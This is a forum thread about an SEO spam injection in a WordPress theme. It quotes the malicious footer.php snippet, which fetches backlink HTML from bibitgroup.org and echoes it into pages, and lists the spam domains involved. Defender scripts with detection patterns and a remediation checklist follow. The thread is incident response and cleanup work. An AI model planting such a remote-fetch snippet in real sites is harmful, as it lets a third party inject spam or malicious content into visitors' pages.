Security incident with all my pages

Hey guys,

An SEO spam injection was identified on our WordPress sites where we use BeTheme. One is only one month old; its only plugin is WP-rocket.

Multiple live pages contained a hidden backlink block directly before the closing </body> tag. The injected links pointed to external spam domains, including:

  • jiaoyu.dianzishu.com
  • digitalgurukul.in
  • topsalesconsulting.com/cazadores
  • pmx.com.pk
  • isris.org

The visible anchor texts included casino-related terms such as:

  • BANDAR SLOT
  • SLOT THAILAND

The source was found in the active WordPress theme file footer.php. A malicious PHP snippet had been inserted directly before </body>:

    <?php
    // Asks a remote server for links, passing this site's hostname so the
    // response can be tailored per domain.
    $ch = curl_init('https://bibitgroup.org/api/backlink?domain=' . urlencode($_SERVER['HTTP_HOST']));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // return the body instead of printing it
    curl_setopt($ch, CURLOPT_TIMEOUT, 3);           // give up after 3 s so the page still loads
    echo curl_exec($ch);                            // print the fetched link block into the HTML
    curl_close($ch);
    ?>

This code dynamically fetched backlink content from bibitgroup.org and printed the response into the frontend HTML.

After removing the injected code and clearing the WordPress/WP Rocket cache, a follow-up live check showed that the known spam links were no longer present on the tested pages, including the homepage, /kontakt/, /arbeitsrecht/, /mietrecht/, and /impressum/.

A related SEO spam pattern was also observed on another page, including a suspicious AMP association in Google Search Console pointing to:

https://kcalculatorxbandarslot.vercel.app/

Any thoughts?


Best

Jannis
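As an added check, not part of Jannis's post: a small defender-side script for the pattern he describes. It flags theme PHP files that fetch a remote URL and echo the response, and lists the external link hosts in a saved copy of a rendered page so a post-cleanup "live check" can be repeated on every page. The sample tree, the `.invalid` hostnames and the page contents are constructed placeholders.

```shell
# Print PHP files under $1 containing the "fetch remote URL and echo it"
# pattern: curl_init()/file_get_contents() on an http(s) URL, or the result
# of curl_exec() passed straight to echo/print. Hits are review candidates.
scan_theme_for_remote_fetch() {
  theme_dir="$1"
  find "$theme_dir" -type f -name '*.php' | sort | while IFS= read -r f; do
    if grep -Eq "(curl_init|file_get_contents)\([[:space:]]*['\"]https?://" "$f" \
       || grep -Eq '(echo|print)[[:space:]]+curl_exec\(' "$f"; then
      printf '%s\n' "$f"
    fi
  done
}

# Print external link hosts (everything except $2, the site's own host)
# found in a saved HTML page $1. Run it on a fresh, uncached fetch of each
# page after cleanup; unknown hosts here mean the injection is still live.
external_link_hosts() {
  page="$1"; own_host="$2"
  grep -Eo 'href="https?://[^/"]+' "$page" \
    | sed -E 's#^href="https?://##' \
    | sort -u \
    | grep -vxF -- "$own_host" || true
}

# Constructed sample tree: a clean footer.php, an infected one mirroring the
# snippet in the thread (placeholder host), and a saved page with a hidden
# link block before </body>. Prints the tree's path.
make_sample_tree() {
  d=$(mktemp -d)
  mkdir -p "$d/clean" "$d/infected"
  cat > "$d/clean/footer.php" <<'EOF'
<?php wp_footer(); ?>
</body>
</html>
EOF
  cat > "$d/infected/footer.php" <<'EOF'
<?php
$ch = curl_init('https://backlink-server.invalid/api?domain=' . urlencode($_SERVER['HTTP_HOST']));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
echo curl_exec($ch);
curl_close($ch);
?>
</body>
</html>
EOF
  cat > "$d/page.html" <<'EOF'
<html><body><a href="https://www.example-law-firm.invalid/kontakt/">Kontakt</a>
<div style="display:none"><a href="https://spam-host.invalid/slot">BANDAR SLOT</a></div>
</body></html>
EOF
  printf '%s\n' "$d"
}

# Usage against a real site (paths are placeholders):
#   scan_theme_for_remote_fetch /var/www/html/wp-content/themes
#   curl -s -H 'Cache-Control: no-cache' https://www.example.invalid/ > /tmp/home.html
#   external_link_hosts /tmp/home.html www.example.invalid
```

The theme scan is a heuristic: a legitimate theme may call file_get_contents() on a remote URL, so treat every hit as something to read, not something to delete. The page check deliberately looks at the whole document rather than only the region before </body>, because the hidden block can be moved; compare the output against the handful of hosts you expect (fonts, maps, analytics).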

Comments

  • Hi,

    Thank you for providing such a detailed report and the specific code snippet found in your footer.php. This is a classic example of an "SEO Spam Injection" or "WordPress Backdoor," and the fact that it occurred on a site with minimal plugins (only WP Rocket) suggests a few possible entry points.

    The PHP snippet you found is designed to dynamically pull spam links from a remote server (bibitgroup.org), making it harder to detect via static scanners since the links themselves aren't stored in your database.

    Here are a few suggestions and steps you should take immediately to secure your environment:

    1. Check for the Entry Point: Since you only use WP Rocket, check if your version of BeTheme or WP Rocket is up to date. Vulnerabilities in outdated themes or plugins are the most common entry points. Also, ensure your WordPress Core is updated.
    2. Audit Your Server for Backdoors: Simply removing the code from footer.php might not be enough. Attackers often leave "backdoors" (hidden scripts) in other directories like wp-content/uploads or wp-includes to regain access later.
    3. Credential Reset (Crucial): If they were able to edit your footer.php, they likely had file system access or admin-level WP access.
      • Change all FTP/SFTP/Hosting Panel passwords.
      • Change all WordPress Admin passwords.
      • Update your Salt Keys in wp-config.php to force-logout all current sessions.
    4. File Permissions: Ensure your file permissions are hardened. Typically, 644 for files and 755 for folders. Consider temporarily setting footer.php to 444 (read-only) after cleaning it.
    5. Check for "Ghost" Admins: Go to Users -> All Users and check for any unauthorized accounts with Administrator privileges.
    6. Scan for Database Injections: Sometimes spam links are also injected into the wp_posts or wp_options tables.

    Best regards
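An added example, not part of the reply above, covering the filesystem side of steps 2 and 4 of that checklist: PHP files sitting under wp-content/uploads (where no legitimate upload is PHP), files and directories whose modes differ from 644/755, and PHP files changed within the last few days, which should line up with your own deployments and updates. The WordPress root and the sample tree are constructed placeholders.

```shell
# PHP files under wp-content/uploads of the WordPress root $1. Legitimate
# uploads are images and documents, so any hit is a backdoor candidate.
php_in_uploads() {
  find "$1/wp-content/uploads" -type f \
    \( -name '*.php' -o -name '*.phtml' -o -name '*.php[0-9]' \) | sort
}

# Files whose mode is not exactly 644 and directories whose mode is not
# exactly 755 under $1. A world-writable file is the usual finding.
loose_permissions() {
  find "$1" -type f ! -perm 644 | sort
  find "$1" -type d ! -perm 755 | sort
}

# PHP files under $1 modified within the last $2 days (default 7).
recently_modified_php() {
  find "$1" -type f -name '*.php' -mtime "-${2:-7}" | sort
}

# Constructed sample WordPress tree: a theme footer last touched months ago,
# an image upload, and a freshly planted, world-writable PHP file under
# uploads. Prints the tree's path.
make_audit_sample() {
  d=$(mktemp -d)
  mkdir -p "$d/wp-content/uploads/2024/05" "$d/wp-content/themes/betheme"
  printf '<?php echo "placeholder"; ?>\n' > "$d/wp-content/uploads/2024/05/cache.php"
  printf 'GIF89a' > "$d/wp-content/uploads/2024/05/logo.gif"
  printf '<?php wp_footer(); ?>\n' > "$d/wp-content/themes/betheme/footer.php"
  # Normalise modes regardless of the caller's umask, then loosen one file.
  find "$d" -type d -exec chmod 755 {} +
  find "$d" -type f -exec chmod 644 {} +
  chmod 666 "$d/wp-content/uploads/2024/05/cache.php"
  touch -t 202401010000 "$d/wp-content/themes/betheme/footer.php"
  printf '%s\n' "$d"
}

# Usage against a real install (path is a placeholder):
#   php_in_uploads /var/www/html
#   loose_permissions /var/www/html
#   recently_modified_php /var/www/html 14
```

Steps 3, 5 and 6 need database access rather than the filesystem; with WP-CLI on the server, `wp user list --role=administrator` lists accounts to compare against the people you actually know, `wp config shuffle-salts` rotates the keys in wp-config.php so every session is logged out, and `wp db query` lets you search wp_posts and wp_options for unexpected anchor tags. Run the permission check before and after cleanup, since an attacker who still has file-system access will loosen the modes again.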
